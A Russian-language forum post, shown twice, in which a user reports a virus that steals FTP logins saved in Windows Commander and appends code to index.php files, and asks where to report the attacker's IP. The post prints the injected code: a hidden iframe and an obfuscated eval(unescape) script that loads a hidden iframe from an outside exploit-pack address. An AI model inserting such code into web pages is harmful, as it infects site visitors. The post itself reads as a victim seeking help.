Статус: Офлайн
Реєстрація: 10.12.2007
Повідом.: 37
Реєстрація: 10.12.2007
Повідом.: 37
Вирус дописывает код в index.php
Всем привет! Интересует может быть кто сталкивался с таим вирусом. Кароче плучается так вирус считывает все акаунты на фтп из Windows Commander и отапляет их кудато. На всех фтп в файл index.php дописывается код:
<!-- [ dfc01aa3ada177750062fe8c820603df ] --><!-- end --><iframe src='Посилання видалено' width='1' height='1' style='visibility: hidden;'></iframe><script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%39%61%64%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%38%38%2e%32%35%35%2e%37%34%2e%32%32%36%2f%70%61%63%6b%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%39%38%32%31%30%29%2b%27%30%35%32%37%30%31%30%39%63%5c%27%20%77%69%64%74%68%3d%36%31%30%20%68%65%69%67%68%74%3d%31%36%31%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>
Если вывести алерт содержимого скрипта то получим:
window.status='Done';document.write('<iframe name=9ad src=\'Посилання видалено' width=610 height=161 style=\'display: none\'></iframe>')
Скажите куда бы отписаться чтобы этот айпишнег нахрен заблокировали или как?
Всем привет! Интересует может быть кто сталкивался с таим вирусом. Кароче плучается так вирус считывает все акаунты на фтп из Windows Commander и отапляет их кудато. На всех фтп в файл index.php дописывается код:
<!-- [ dfc01aa3ada177750062fe8c820603df ] --><!-- end --><iframe src='Посилання видалено' width='1' height='1' style='visibility: hidden;'></iframe><script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%39%61%64%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%38%38%2e%32%35%35%2e%37%34%2e%32%32%36%2f%70%61%63%6b%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%39%38%32%31%30%29%2b%27%30%35%32%37%30%31%30%39%63%5c%27%20%77%69%64%74%68%3d%36%31%30%20%68%65%69%67%68%74%3d%31%36%31%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>
Если вывести алерт содержимого скрипта то получим:
window.status='Done';document.write('<iframe name=9ad src=\'Посилання видалено' width=610 height=161 style=\'display: none\'></iframe>')
Скажите куда бы отписаться чтобы этот айпишнег нахрен заблокировали или как?
).
